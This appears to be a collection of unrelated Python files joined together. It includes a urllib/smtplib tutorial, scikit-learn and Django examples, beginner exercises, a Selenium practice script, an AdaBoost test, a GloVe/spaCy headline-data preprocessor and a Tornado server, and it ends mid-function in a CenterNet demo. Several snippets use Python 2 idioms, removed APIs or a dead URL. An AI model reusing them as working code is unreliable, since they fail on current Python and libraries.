# Internet Access: stdlib tutorial snippets (urllib + smtplib).
# NOTE(review): the USNO timer URL has been offline for years; this demo
# will raise unless pointed at a live server.
from urllib.request import urlopen
with urlopen('http://tycho.usno.navy.mil/cgi-bin/timer.pl') as response:
    for line in response:
        line = line.decode('utf-8')   # response yields bytes; decode to text
        if 'EST' in line or 'EDT' in line:
            print(line)

import smtplib
# Requires a local SMTP server listening on port 25.
# NOTE(review): the envelope addresses use '.ort' while the headers use
# '.org' — mismatch kept as in the original tutorial.
server = smtplib.SMTP('localhost')
server.sendmail('soothsayer@example.ort', 'jcaesar@example.ort',
"""To: jcaesar@example.org
From: soothsayer@example.org

Beware the Ides of March
""")
server.quit()
|
# To ignore the warnings
import warnings
warnings.filterwarnings('ignore')
# importing necessary libraries
import pandas as pd
import numpy as np
from sklearn.metrics import accuracy_score
# matplotlib is for visualization purpose
import matplotlib.pyplot as plt
from matplotlib import rcParams
rcParams['figure.figsize'] = 10,6
from sklearn.feature_extraction.text import CountVectorizer

# Toy corpus: learn a bag-of-words vocabulary and transform the messages.
messages = ['call you tonight', 'Call me a cab', 'please call me.. please']
# instantiate CountVectorizer (vectorizer)
vect = CountVectorizer()
vect.fit(messages)
# NOTE(review): get_feature_names() is removed in newer scikit-learn;
# use get_feature_names_out() there.
vect.get_feature_names()
messages_transformed = vect.transform(messages)
print(messages)
print(vect.get_feature_names())
# Dense document-term matrix (rows = messages, columns = vocabulary terms)
messages_transformed.toarray()
data = pd.DataFrame(messages_transformed.toarray())
data.columns = vect.get_feature_names()
print(messages)
data.head()
# Attach a toy label per message
data.loc[0,'outcome'] ='info'
data.loc[1,'outcome'] ='order'
data.loc[2,'outcome'] = "request"
data.head()
|
from django.db import models
# Create your models here.
class Partner(models.Model):
    """A partner (influencer) with a display name and a photo."""
    full_name = models.CharField(max_length=255)
    photo = models.ImageField(upload_to='partner/')

    def __str__(self):
        # Bug fix: this was named `str`, which Django never calls; the
        # human-readable representation must be the dunder __str__.
        return self.full_name
class Category(models.Model):
    """A category a social-network account can belong to."""
    name = models.CharField(max_length=255)

    def __str__(self):
        # Bug fix: was named `str`; Django only uses the dunder __str__.
        return self.name
class SocialNetwork(models.Model):
    """A partner's account on one social network, with subscriber count and price."""
    YOUTUBE = "YOUTUBE"
    TIKTOK = "TIKTOK"
    INSTAGRAM = "INSTAGRAM"
    TELEGRAM = "TELEGRAM"
    # NOTE(review): keeps the original 'CHOUCES' spelling because external
    # code may reference this attribute; consider renaming in a follow-up.
    SOCIAL_NETWORK_CHOUCES = (
        (TELEGRAM, TELEGRAM),
        (TIKTOK, TIKTOK),
        (INSTAGRAM, INSTAGRAM),
        (YOUTUBE, YOUTUBE),
    )
    sub_count = models.IntegerField(default=0)
    url = models.URLField()
    name = models.CharField(choices=SOCIAL_NETWORK_CHOUCES, max_length=100)
    price = models.CharField(max_length=100)
    category = models.ForeignKey(Category, on_delete=models.SET_NULL, null=True)
    partner = models.ForeignKey(Partner, on_delete=models.CASCADE)

    def __str__(self):
        # Bug fix: was named `str`; Django only uses the dunder __str__.
        return f"{self.name}|{self.partner.full_name}"
# Beginner arithmetic / input exercises.
print(1+2)
a=10
b=a+10
c=b+10
print(c)
a=1
b=3
c=4
# Operator precedence demo: ** then // and *, then +
d=2**2+a+b//2*c
f=d%2
print(f)
print(b+a)
print(a*b)
print("3月19日的作业")
# Read a name and an age, convert the age to int, compute next year's age
name=input("请输入名字>>>")
age=input("请输入小明今年的年龄>>>")
a=int(age)
age1=a+1
b=type(a)
age2=str(age1)
print(b)
# The name is wrapped in CJK quotation marks in the output
print('我的名字是“'+name+'”,明年的年龄是'+age2+'岁了')
from django.urls import reverse_lazy
# Create your views here.
from django.views.generic.edit import CreateView,UpdateView,DeleteView
from django.views.generic.list import ListView
from django.views.generic.detail import DetailView
from .models import Book
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib.auth.mixins import LoginRequiredMixin
class BookDetail(LoginRequiredMixin,DetailView):
    """Detail page for one Book, looked up by its ISBN slug; login required."""
    model = Book
    template_name = "book_detail.html"
    # URLs address books by ISBN instead of the default pk/slug
    slug_field = 'isbn'
    login_url = '/accounts/login/'
    #success_url = '/success/'
    #success_message = "%(name)s was created successfully"
class BookCreate(LoginRequiredMixin,SuccessMessageMixin,CreateView):
    """Create a Book; login required; flashes a success message on save.

    Cleanup: removed import-time debug prints, dead commented-out code, the
    redundant `message` alias, and fixed the 'sucessfully' typo in the
    user-facing message.
    """
    model = Book
    fields = ['name','isbn']
    login_url = '/accounts/login/'
    success_url = reverse_lazy('book_list')
    # %(name)s is interpolated by SuccessMessageMixin from the form's cleaned data
    success_message = "%(name)s was created successfully"
class BookList(LoginRequiredMixin,ListView):
    """List all Books; login required."""
    model = Book
    template_name = "book_list.html"
    login_url = '/accounts/login/'
class BookUpdate(LoginRequiredMixin,UpdateView):
    """Edit a Book (addressed by ISBN); login required.

    Uses the book_update_form.html template via template_name_suffix.
    """
    model = Book
    slug_field = 'isbn'
    fields = ['name','isbn']
    template_name_suffix = '_update_form'
    success_url = reverse_lazy('book_list')
    login_url = '/accounts/login/'
class BookDelete(LoginRequiredMixin,DeleteView):
    """Delete a Book (addressed by ISBN); login required."""
    model = Book
    slug_field = 'isbn'
    success_url = reverse_lazy('book_list')
    login_url = '/accounts/login/'
|
from selenium import webdriver
from selenium.webdriver.support.ui import Select
def print_ans(val):
    """Print the last whitespace-separated token of the browser's alert text,
    then accept (dismiss) the alert."""
    alert = val.switch_to.alert
    last_token = alert.text.split()[-1]
    print(last_token)
    alert.accept()
# Solve the Stepik select exercise: sum the two displayed numbers, pick the
# matching dropdown option, submit, and report the alert's answer.
try:
    browser = webdriver.Chrome()
    browser.get('http://suninjuly.github.io/selects1.html')
    summ = str(int(browser.find_element_by_id('num1').text) + int(browser.find_element_by_id('num2').text))
    select = Select(browser.find_element_by_id("dropdown"))
    select.select_by_value(summ)
    browser.find_element_by_css_selector('button.btn').click()
finally:
    # Always print the result and close the browser, even on failure
    print_ans(browser)
    browser.quit()
|
import unittest
from katas.kyu_8.powers_of_2 import powers_of_two
class PowersOfTwoTestCase(unittest.TestCase):
    """Tests for the kyu-8 kata: powers_of_two(n) lists 2**0 .. 2**n."""
    def test_equal_1(self):
        self.assertEqual(powers_of_two(0), [1])
    def test_equal_2(self):
        self.assertEqual(powers_of_two(1), [1, 2])
    def test_equal_3(self):
        self.assertEqual(powers_of_two(4), [1, 2, 4, 8, 16])
|
# NOTE(review): wildcard numpy import kept for compatibility with the
# commented-out experiments below; prefer `import numpy as np` in new code.
from numpy import *
import adaboost
'''
datMat,classLabels=adaboost.loadSimpData()
#print(datMat[:,0])
#print( ones((shape(datMat)[0],1)))
D=mat(ones((5,1))/5)
#print(D)
#print(adaboost.buildStump(datMat,classLabels,D))
#adaboost.buildStump(datMat,classLabels,D)
classifierArray,kk=adaboost.adaBoostTrainDS(datMat,classLabels,44)
print(classifierArray)
#adaboost.addrin()
ans=adaboost.adaClassify(datMat,classifierArray)
#print(ans)
'''
# Train an AdaBoost ensemble (40 weak learners) on the horse-colic data
datArr,labelArr=adaboost.loadDataSet('horseColicTraining2.txt')
classifierArray,aggClassEst=adaboost.adaBoostTrainDS(datArr,labelArr,40)
#print(classifierArray)
#print(aggClassEst[0:10])
#print(shape(aggClassEst.T))
#sortedIndicies = aggClassEst.T.argsort()
#print(shape(sortedIndicies))
#print(sortedIndicies[0,:10])
#print(sortedIndicies[0])
#print(len(classifierArray))
#adaboost.plotROC(aggClassEst.T,labelArr)
## Evaluate on the held-out test set and print the error rate
datatest,labeltest=adaboost.loadDataSet('horseColicTest2.txt')
pre=adaboost.adaClassify(datatest,classifierArray)
s=0
wrong=0
for i in range(len(pre)):
    s+=1
    if pre[i]!=labeltest[i]:
        wrong+=1
# Fraction of misclassified test samples
print(wrong/s)
|
def intersect(seq1, seq2):
    """Return the items of *seq1* that also occur in *seq2*, in order.

    Duplicates in *seq1* are kept. Works on any pair of sequences
    (strings, lists, tuples, ...).
    """
    # Comprehension replaces the manual append loop (and drops the stray
    # semicolon). Still O(len(seq1) * len(seq2)); convert seq2 to a set
    # first if both inputs are large and hashable.
    return [item for item in seq1 if item in seq2]
# Demo: common characters of two strings, in first-string order
s1 = 'spam'
s2 = 'scam'
value = intersect(s1, s2)
print(value)   # ['s', 'a', 'm']
|
import itertools
import json
from collections import Counter
from nltk import tokenize
from tensorflow.python.platform import gfile
import re
import os
import numpy as np
from nltk import tokenize as nltk_tokenizor
from spacy.en import English
parser = English()
# Special vocabulary symbols - we always put them at the start.
_PAD = b"_PAD"   # padding
_GO = b"_GO"     # decoder start-of-sequence
_EOS = b"_EOS"   # end-of-sequence
_UNK = b"_UNK"   # unknown word
_START_VOCAB = [_PAD, _GO, _EOS, _UNK]
# Prefix for out-of-vocabulary placeholder tokens (_OOV0, _OOV1, ...)
_OOV = b"_OOV"

# Fixed ids of the special symbols above (their positions in _START_VOCAB)
PAD_ID = 0
GO_ID = 1
EOS_ID = 2
UNK_ID = 3

# Regular expressions used to tokenize.
_WORD_SPLIT = re.compile(b"([.,!?\"':;)(])")
_DIGIT_RE = re.compile(br"\d")
def load_article(raw_path, early_stop, batch_size):
    '''
    Stream batches of sentence-tokenized articles from a JSON-lines file.

    NOTE(review): Python 2 code — itertools.izip_longest is zip_longest on
    Python 3. The two branches below duplicate the same batching loop; the
    only difference is the early_stop countdown.

    :param raw_path: JSON-lines file with 'title' and 'content' per line
    :param early_stop: stop after this many articles (falsy = no limit)
    :param batch_size: number of lines grouped per yielded batch
    :return: yields {'title': [...], 'content': [...]} per batch
    '''
    article_index = 0
    # NOTE(review): this handle is opened but never used or closed
    sample_file = open(raw_path)
    if early_stop:
        with open(raw_path) as f:
            # izip_longest pads the last batch with None
            for next_n_lines in itertools.izip_longest(*[f] * batch_size):
                articles = {"title": [], "content": []}
                for line in next_n_lines:
                    if line:
                        json_data = json.loads(line.strip())
                        articles["title"].append(json_data['title'])
                        articles["content"].append(json_data['content'])
                        early_stop -= 1
                        if early_stop <= 0:
                            break
                tok_articles = {'title': [" ".join(tokenize.sent_tokenize(c)) for c in articles['title']],
                                'content': [" ".join(tokenize.sent_tokenize(c)) for c in articles['content']]}
                # print("len(tok_articles['content']", len(tok_articles['content']))
                yield tok_articles
                if early_stop <= 0:
                    break
    else:
        with open(raw_path) as f:
            for next_n_lines in itertools.izip_longest(*[f] * batch_size):
                articles = {"title": [], "content": []}
                for line in next_n_lines:
                    if line:
                        json_data = json.loads(line.strip())
                        articles["title"].append(json_data['title'])
                        articles["content"].append(json_data['content'])
                tok_articles = {'title': [" ".join(tokenize.sent_tokenize(c)) for c in articles['title']],
                                'content': [" ".join(tokenize.sent_tokenize(c)) for c in articles['content']]}
                yield tok_articles
import unicodedata
# def create_text_data(raw_path, content_path, title_path):
# with gfile.GFile(raw_path, mode="rb") as raw:
# with gfile.GFile(content_path, mode="wb") as content_file:
# with gfile.GFile(title_path, mode="wb") as title_file:
#
# for i, line in enumerate(raw):
# if i > 0:
# break
#
# if line:
# json_data = json.loads(line.strip())
# # print("create_text_data: "+json_data['title'])
#
# decoded = unicodedata.normalize('NFKD', json_data['content']).encode('ASCII', 'ignore')
# content_list = decoded.split("\n")
# print(json_data['content'].split("\n"))
# print(content_list)
# content_line = " ".join(nltk_tokenizor.sent_tokenize("".join(content_list)))
# decoded = unicodedata.normalize('NFKD', json_data['title']).encode('ASCII', 'ignore')
# title_line = "".join(decoded.split("\n"))
# title_file.write(title_line + b"\n")
# content_file.write(content_line + b"\n")
def create_text_data(raw_path, content_path, title_path, sentence_truncate=None, tokenizer=None, normalize_digits=False):
    """Split a JSON-lines corpus into parallel title/content text files,
    one tokenized sentence-joined line per article.

    NOTE(review): Python 2 code — `" ".join(tokens) + b"\\n"` mixes str and
    bytes and would raise on Python 3.

    :param raw_path: JSON-lines input with 'title' and 'content' per line
    :param content_path: output file for article contents
    :param title_path: output file for article titles
    :param sentence_truncate: keep only the first N sentences of each text
    :param tokenizer: tokenizer function; basic_tokenizer when None
    :param normalize_digits: replace every digit with '0' when True
    """
    print("start create_text_data...")
    counter = 0
    with gfile.GFile(raw_path, mode="rb") as raw:
        with gfile.GFile(content_path, mode="wb") as content_file:
            with gfile.GFile(title_path, mode="wb") as title_file:
                for i, line in enumerate(raw):
                    # if i >= 100:
                    #     break
                    counter += 1
                    if counter % 100000 == 0:
                        print("Create vocab: processing line %d" % counter)
                    json_data = json.loads(line.strip())
                    # Write the title to title_file and the content to content_file
                    for sentence, file in zip((json_data['title'], json_data['content']),(title_file, content_file)):
                        if sentence_truncate:
                            # sentence = "".join("".join(sentence.split("\n")).split("\r"))
                            # Flatten newlines before sentence-truncating
                            sentence = ''.join(sentence.splitlines())
                            sentence = truncate_article(sentence, sentence_truncate)
                        else:
                            sentence = ''.join(sentence.splitlines())
                            # sentence = "".join("".join(sentence.split("\n")).split("\r"))
                        tokens = tokenizer(sentence) if tokenizer else basic_tokenizer(sentence)
                        if normalize_digits:
                            tokens = [re.sub(_DIGIT_RE, b"0", w) for w in tokens]
                        output = " ".join(tokens)+ b"\n"
                        file.write(output.encode("utf8"))
def basic_tokenizer(sentence):
    """Very basic tokenizer: whitespace-split, then split off punctuation.

    Empty fragments are dropped and every token is lower-cased.
    """
    pieces = []
    for fragment in sentence.strip().split():
        pieces += re.split(_WORD_SPLIT, fragment)
    return [piece.lower() for piece in pieces if piece]
def spacy_tokenizer(sentence):
    """Tokenize *sentence* with the module-level spaCy parser and return
    lower-cased token strings."""
    parsedData = parser(sentence)
    return [word.orth_.lower() for word in parsedData]
def truncate_article(article_content, sentence_num):
    """Return the first *sentence_num* sentences of *article_content*,
    re-joined with single spaces, using spaCy sentence segmentation.

    NOTE(review): Python 2 code — `unicode` does not exist on Python 3.
    """
    if not isinstance(article_content, unicode):
        article_content = article_content.decode("utf8")
    parsedData = parser(article_content)
    sents = []
    for span in parsedData.sents:
        # go from the start to the end of each span, returning each token in the sentence
        # combine each token using join()
        sent = ''.join(parsedData[i].string for i in range(span.start, span.end)).strip()
        sents.append(sent)
    return " ".join(sents[:sentence_num])
def get_vocab_counter(json_file_path, sentence_truncate=None, tokenizer=None, normalize_digits=True):
    """Count token frequencies over the titles and contents of a JSON-lines
    corpus and return them as a collections.Counter.

    :param json_file_path: JSON-lines input with 'title' and 'content' per line
    :param sentence_truncate: keep only the first N sentences of each text
    :param tokenizer: tokenizer function; basic_tokenizer when None
    :param normalize_digits: replace every digit with '0' when True
    """
    counter = 0
    vocab = Counter()
    with gfile.GFile(json_file_path, mode="rb") as f:
        for line in f:
            counter += 1
            if counter % 100000 == 0:
                print("Create vocab: processing line %d" % counter)
            json_data = json.loads(line.strip())
            for sentence in (json_data['title'], json_data['content']):
                if sentence_truncate:
                    sentence = truncate_article(sentence, sentence_truncate)
                tokens = tokenizer(sentence) if tokenizer else basic_tokenizer(sentence)
                if normalize_digits:
                    tokens = [re.sub(_DIGIT_RE, b"0", w) for w in tokens]
                for token in tokens:
                    vocab[token] += 1
    return vocab
# modified
def create_vocabulary(vocabulary_path, train_json_path, evl_json_path,
                      max_vocabulary_size, oov_size, sentence_truncate=None, tokenizer=None, normalize_digits=True):
  """Create vocabulary file (if it does not exist yet) from data file.

  Data file is assumed to contain one sentence per line. Each sentence is
  tokenized and digits are normalized (if normalize_digits is set).
  Vocabulary contains the most-frequent tokens up to max_vocabulary_size.
  We write it to vocabulary_path in a one-token-per-line format, so that later
  token in the first line gets id=0, second line gets id=1, and so on.

  NOTE(review): Python 2 code — `map` returning a list, `xrange`, and the
  bytes+str concat `_OOV + "{}".format(i)` all break on Python 3.

  Args:
    vocabulary_path: path where the vocabulary will be created.
    train_json_path: training data used to count token frequencies.
    evl_json_path: evaluation data also included in the counts.
    max_vocabulary_size: limit on the size of the created vocabulary.
    oov_size: number of OOV placeholder tokens reserved at the end of the
      vocabulary, used for keeping unknown words in the inputs.
    sentence_truncate: number of sentences kept from the article start.
    tokenizer: a function to use to tokenize each data sentence;
      if None, basic_tokenizer will be used.
    normalize_digits: Boolean; if true, all digits are replaced by 0s.
  """
  if not gfile.Exists(vocabulary_path):
    print("Creating vocabulary %s" % (vocabulary_path))
    vocabcount = Counter()
    vocabcount += get_vocab_counter(train_json_path, sentence_truncate=sentence_truncate, tokenizer=None, normalize_digits=True)
    vocabcount += get_vocab_counter(evl_json_path, sentence_truncate=sentence_truncate, tokenizer=None, normalize_digits=True)
    # Tokens sorted by descending frequency
    vocab = map(lambda x: x[0], sorted(vocabcount.items(), key=lambda x: -x[1]))
    vocab_list = _START_VOCAB + vocab
    if len(vocab_list) > max_vocabulary_size:
      # Trim to leave room for the OOV placeholders appended below
      vocab_list = vocab_list[:max_vocabulary_size-oov_size]
    for i in xrange(oov_size):
      oov_word = _OOV+"{}".format(i)
      vocab_list.append(oov_word)
    with gfile.GFile(vocabulary_path, mode="wb") as vocab_file:
      for w in vocab_list:
        vocab_file.write(w.encode('utf8') + b"\n")
def sentence_to_token_ids(sentence, vocabulary, oov_size, tokenizer=None, normalize_digits=True):
  """Convert a string to list of integers representing token-ids.

  For example, a sentence "I have a dog" may become tokenized into
  ["I", "have", "a", "dog"] and with vocabulary {"I": 1, "have": 2,
  "a": 4, "dog": 7"} this function will return [1, 2, 4, 7].

  When oov_size > 0, unknown words are assigned OOV placeholder ids; the
  same unknown word reuses the same placeholder, and once the placeholders
  run out further unknowns map to UNK_ID.

  Fixes: removed a leftover debug print; membership tests use the dict
  directly instead of .keys(); the placeholder-reuse map is keyed by the
  unknown word itself (it was keyed by the placeholder name, so the reuse
  promised by the docstring never happened).

  Args:
    sentence: the sentence in bytes format to convert to token-ids.
    vocabulary: a dictionary mapping tokens to integers.
    oov_size: number of OOV placeholders available for unknown words.
    tokenizer: a function to use to tokenize each sentence;
      if None, basic_tokenizer will be used.
    normalize_digits: Boolean; if true, all digits are replaced by 0s.

  Returns:
    a list of integers, the token-ids for the sentence.
  """
  if tokenizer:
    words = tokenizer(sentence)
  else:
    words = basic_tokenizer(sentence)
  if oov_size > 0:
    sentence_ids = []
    unknown_to_placeholders = {}
    current_oov_index = 0
    for w in words:
      if normalize_digits:
        w = re.sub(_DIGIT_RE, b"0", w)
      if w not in vocabulary:
        # For the same unknown word, use the same placeholder
        if w in unknown_to_placeholders:
          sentence_ids.append(unknown_to_placeholders[w])
        # For a new unknown word, assign the next free placeholder
        elif current_oov_index < oov_size:
          newplaceholder = _OOV+"{}".format(current_oov_index)
          placeholder_id = vocabulary.get(newplaceholder, UNK_ID)
          unknown_to_placeholders[w] = placeholder_id
          sentence_ids.append(placeholder_id)
          current_oov_index += 1
        # No more free placeholders: fall back to UNK_ID
        else:
          sentence_ids.append(UNK_ID)
      else:
        sentence_ids.append(vocabulary[w])
    return sentence_ids
  else:
    if not normalize_digits:
      return [vocabulary.get(w, UNK_ID) for w in words]
    # Normalize digits by 0 before looking words up in the vocabulary.
    return [vocabulary.get(re.sub(_DIGIT_RE, b"0", w), UNK_ID) for w in words]
def initialize_vocabulary(vocabulary_path):
    """Initialize vocabulary from file.

    We assume the vocabulary is stored one-item-per-line, so a file:
      dog
      cat
    results in a vocabulary {"dog": 0, "cat": 1}, and this function also
    returns the reversed vocabulary ["dog", "cat"].

    Args:
        vocabulary_path: path to the file containing the vocabulary.

    Returns:
        A pair: the vocabulary (a dictionary mapping string to integers), and
        the reversed vocabulary (a list, which reverses the vocabulary mapping).

    Raises:
        ValueError: if the provided vocabulary_path does not exist.
    """
    if not gfile.Exists(vocabulary_path):
        # Bug fix: the path was previously passed as a second exception
        # argument, so "%s" was never interpolated into the message.
        raise ValueError("Vocabulary file %s not found." % vocabulary_path)
    with gfile.GFile(vocabulary_path, mode="rb") as f:
        rev_vocab = [line.strip() for line in f.readlines()]
    vocab = {token: index for index, token in enumerate(rev_vocab)}
    return vocab, rev_vocab
def data_to_token_ids(json_data_path, title_path, content_path, vocabulary_path, oov_size, sentence_truncate=None,
                      tokenizer=None, normalize_digits=True):
    """Tokenize a jsonl data file into token-id files using a vocabulary.

    Each input line is a JSON object with 'title' and 'content' fields; the
    corresponding token-id lines are written to title_path and content_path.
    The work is skipped entirely when title_path already exists.

    Args:
        json_data_path: path to the jsonl data file.
        title_path: output path for title token-id lines.
        content_path: output path for content token-id lines.
        vocabulary_path: path to the vocabulary file.
        oov_size: number of out-of-vocabulary placeholder slots.
        sentence_truncate: when set, keep only this many leading sentences.
        tokenizer: tokenizer function; basic_tokenizer is used when None.
        normalize_digits: if True, all digits are replaced by 0s.
    """
    if gfile.Exists(title_path):
        print("Use exist file:", title_path)
        print("Use exist file:", content_path)
        return
    print("Tokenizing data in %s" % json_data_path)
    vocab, _ = initialize_vocabulary(vocabulary_path)
    with gfile.GFile(json_data_path, mode="rb") as data_file, \
            gfile.GFile(title_path, mode="wb") as title_file, \
            gfile.GFile(content_path, mode="wb") as content_file:
        for counter, line in enumerate(data_file, start=1):
            if counter % 100000 == 0:
                print(" tokenizing line %d" % counter)
            record = json.loads(line.strip())
            # Tokenize the title and the content with the same settings,
            # writing each to its own output file.
            pairs = [(record['title'].encode("utf8"), title_file),
                     (record['content'].encode("utf8"), content_file)]
            for sentence, out_file in pairs:
                if sentence_truncate:
                    sentence = truncate_article(sentence, sentence_truncate)
                token_ids = sentence_to_token_ids(sentence, vocab, oov_size, tokenizer,
                                                  normalize_digits)
                out_file.write((" ".join(str(tok) for tok in token_ids) + "\n").encode('utf8'))
# modified
def prepare_headline_generation_data(data_dir, vocabulary_size, oov_size, sentence_truncate=None, tokenizer=None):
    """Create the vocabulary and the token-id data sets for headline generation.

    Args:
        data_dir: directory in which the generated data sets are stored.
        vocabulary_size: size of the vocabulary to create and use.
        oov_size: number of out-of-vocabulary placeholder slots used to keep
            unknown words in the inputs.
        sentence_truncate: number of sentences taken from the beginning of
            each article (None keeps the whole article).
        tokenizer: function used to tokenize each sentence; basic_tokenizer
            is used when None.

    Returns:
        A tuple of 5 paths:
          (1) token-ids for the training content,
          (2) token-ids for the training titles,
          (3) token-ids for the evaluation content,
          (4) token-ids for the evaluation titles,
          (5) the vocabulary file.

    Raises:
        ValueError: if the training data file does not exist.
    """
    train_content_path = os.path.join(data_dir, "train_content")
    train_title_path = os.path.join(data_dir, "train_title")
    evl_content_path = os.path.join(data_dir, "evl_content")
    evl_title_path = os.path.join(data_dir, "evl_title")
    train_json_path = '../../sample_data/train.jsonl'
    evl_json_path = '../../sample_data/test.jsonl'
    if not gfile.Exists(train_json_path):
        # Bug fix: the old message passed "%s" unformatted as a second
        # exception argument and blamed the wrong path (train_content_path).
        raise ValueError("Training data file %s not found." % train_json_path)
    # Create the vocabulary of the appropriate size.
    vocab_path = os.path.join(data_dir, "vocab_%d" % vocabulary_size)
    create_vocabulary(vocab_path, train_json_path, evl_json_path,
                      vocabulary_size, oov_size, sentence_truncate, tokenizer)
    # Create token ids for the training data.
    train_content_ids_path = train_content_path + (".ids_%d" % vocabulary_size)
    train_title_ids_path = train_title_path + (".ids_%d" % vocabulary_size)
    data_to_token_ids(train_json_path, train_title_ids_path, train_content_ids_path,
                      vocab_path, oov_size, sentence_truncate, tokenizer)
    # Create token ids for the development data.
    evl_content_ids_path = evl_content_path + (".ids_%d" % vocabulary_size)
    evl_title_ids_path = evl_title_path + (".ids_%d" % vocabulary_size)
    data_to_token_ids(evl_json_path, evl_title_ids_path, evl_content_ids_path,
                      vocab_path, oov_size, sentence_truncate, tokenizer)
    return (train_content_ids_path, train_title_ids_path,
            evl_content_ids_path, evl_title_ids_path,
            vocab_path)
def get_glove_embedding_matrix(glove_name, embedding_dim):
    """Load a GloVe text file into an index dict and a scaled weight matrix.

    Args:
        glove_name: path to a GloVe file ("word v1 v2 ... vD" per line).
        embedding_dim: dimensionality D of the vectors in the file.

    Returns:
        (glove_index_dict, glove_embedding_weights) where glove_index_dict
        maps each word to its row index and glove_embedding_weights is a
        (n_words, embedding_dim) float array scaled by 0.1.
    """
    with open(glove_name) as f:
        glove_n_symbols = sum(1 for _ in f)
    glove_index_dict = {}
    glove_embedding_weights = np.empty((glove_n_symbols, embedding_dim))
    globale_scale = .1
    with open(glove_name, 'r') as fp:
        for i, raw_line in enumerate(fp):
            parts = raw_line.strip().split()
            glove_index_dict[parts[0]] = i  # word -> row index of the matrix
            # Bug fix: under Python 3 map() returns an iterator, which numpy
            # cannot assign to a matrix row; materialize the floats first.
            glove_embedding_weights[i, :] = [float(v) for v in parts[1:]]
    glove_embedding_weights *= globale_scale
    return glove_index_dict, glove_embedding_weights
def get_word_embedding_from_valcabulary(glove_index_dict, glove_embedding_weights, idx2word, embedding_dim, vocab_size):
    """Build an embedding matrix for the vocabulary from GloVe vectors.

    Words found in GloVe (directly, lower-cased, or with a leading '#'
    stripped) copy their GloVe vector; every other row keeps a random
    uniform vector drawn at the same scale as the GloVe weights.

    :param glove_index_dict: word -> row index of glove_embedding_weights
    :param glove_embedding_weights: GloVe word vectors
    :param idx2word: mapping from vocabulary index to word
    :param embedding_dim: dimensionality of the vectors
    :param vocab_size: vocabulary size
    :return: (vocab_size, embedding_dim) array of word vectors
    """
    # Deterministic random rows for words missing from GloVe.
    np.random.seed(42)
    shape = (vocab_size, embedding_dim)
    print("debug: in get_word_embedding_from_valcabulary(): word embedding shape", shape)
    # Uniform on [-s, s] has std s/sqrt(3); match the GloVe weights' spread.
    scale = glove_embedding_weights.std() * np.sqrt(12) / 2
    embedding = np.random.uniform(low=-scale, high=scale, size=shape)
    copied = 0
    for row in range(vocab_size):
        word = idx2word[row]
        glove_row = glove_index_dict.get(word, glove_index_dict.get(word.lower()))
        if glove_row is None and word.startswith('#'):
            # GloVe has no hashtags; retry without the leading '#'.
            stripped = word[1:]
            glove_row = glove_index_dict.get(stripped, glove_index_dict.get(stripped.lower()))
        if glove_row is not None:
            # Copy the GloVe vector over the random initialization.
            embedding[row, :] = glove_embedding_weights[glove_row, :]
            copied += 1
    return embedding
import pickle


def get_glove_embedding(vocab_path, embedding_path, glove_dir, size, source_vocab_size):
    """Return the vocabulary's embedding matrix, caching it as a pickle.

    Loads the cached matrix from embedding_path when it exists; otherwise
    derives it from the GloVe file and writes the cache for next time.
    """
    if gfile.Exists(embedding_path):
        # Fast path: reuse the previously computed embedding matrix.
        with open(embedding_path, 'rb') as cache:
            return pickle.load(cache)
    _, rev_vocab = initialize_vocabulary(vocab_path)
    glove_index_dict, glove_weights = get_glove_embedding_matrix(glove_dir, size)
    # Use the GloVe matrix to build the embedding matrix of our vocabulary.
    matrix = get_word_embedding_from_valcabulary(glove_index_dict, glove_weights,
                                                 rev_vocab, size, source_vocab_size)
    # Save the embedding into a pickle file for later runs.
    with open(embedding_path, 'wb') as cache:
        pickle.dump(matrix, cache, -1)
    return matrix
def main():
    """Preprocess the raw jsonl corpora into tokenized content/title files."""
    print("Preprocess initialiated...")
    data_dir = "../sample_data"
    raw_train_path = '../../sample_data/train.jsonl'
    raw_val_path = '../../sample_data/test.jsonl'
    sentence_trunctate = 5
    # (raw jsonl, content output, title output) for train then eval.
    targets = [
        (raw_train_path, os.path.join(data_dir, "train_content"), os.path.join(data_dir, "train_title")),
        (raw_val_path, os.path.join(data_dir, "evl_content"), os.path.join(data_dir, "evl_title")),
    ]
    for raw_path, content_path, title_path in targets:
        create_text_data(raw_path, content_path, title_path, sentence_trunctate, spacy_tokenizer)
    # with gfile.GFile(train_content_path, mode="rb") as f:
    #     for line in f:
    #         print(line.decode("utf8"))


if __name__ == "__main__":
    main()
|
#!/usr/bin/env python3
"""
A simple web server made using Tornado.
It serves the basic webpage located in this file's folder.
For reading on the structure of a Tornado web application read:
http://www.tornadoweb.org/en/stable/guide/structure.html
It works sort of like this:
The Application object is what manages routing the routing table and global config.
It maps requests such as / to certain handlers
"""
import os # Used to get proper paths to static/template folders
import tornado.httpserver # Default http server
import tornado.ioloop # Not sure
import tornado.options # Used for settings
import tornado.web # Contains Application / RequestHandler classes
# Tell template renderer where html, css, and js are located
TEMPLATE_PATH = os.path.join(os.path.dirname(__file__), "templates")
STATIC_PATH = os.path.join(os.path.dirname(__file__), "static")
class Application(tornado.web.Application):
    """Tornado application: routing table plus template/static path settings."""
    def __init__(self):
        # Route table: map the site root to the index page handler.
        handlers = [
            (r"/", IndexHandler)
        ]
        settings = dict(
            template_path = TEMPLATE_PATH,
            static_path = STATIC_PATH
        )
        # **settings is called keyword argument unpacking.
        # f(**settings) -> f(template_path=blah, static_path=bleh)
        tornado.web.Application.__init__(self, handlers, **settings)
# A basic hander for requests to "/".
# This renders index.html. Render looks by default inside the "templates"
# folder, which was specified in the settings in Application.
# Because it is templated for the css and js, they are "rendered" as well
class IndexHandler(tornado.web.RequestHandler):
    """Serves GET / by rendering templates/index.html."""
    def get(self):
        self.render('index.html')
# Make an http server that serves our application to the provided port.
def main():
    """Serve the application on port 8888 until the process is stopped."""
    httpServer = tornado.httpserver.HTTPServer(Application())
    httpServer.listen(8888)
    # Start the event loop; this call blocks forever.
    tornado.ioloop.IOLoop.current().start()
if __name__ == "__main__":
    main()
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from opts import opts
from detectors.detector_factory import detector_factory
import os
import cv2
import numpy as np
import sys
CENTERNET_PATH = 'CENTERNET_PATH/deep-sort-plus-pytorch/CenterNet/src/lib/'
sys.path.insert(0, CENTERNET_PATH)
image_ext = ['jpg', 'jpeg', 'png', 'webp']
video_ext = ['mp4', 'mov', 'avi', 'mkv']
time_stats = ['tot', 'load', 'pre', 'net', 'dec', 'post', 'merge']
def demo(opt):
    """Run detection on a webcam stream, a video file, an image directory,
    or a single image, writing MOT-format detections to opt.det_result_file.
    """
    os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpus_str
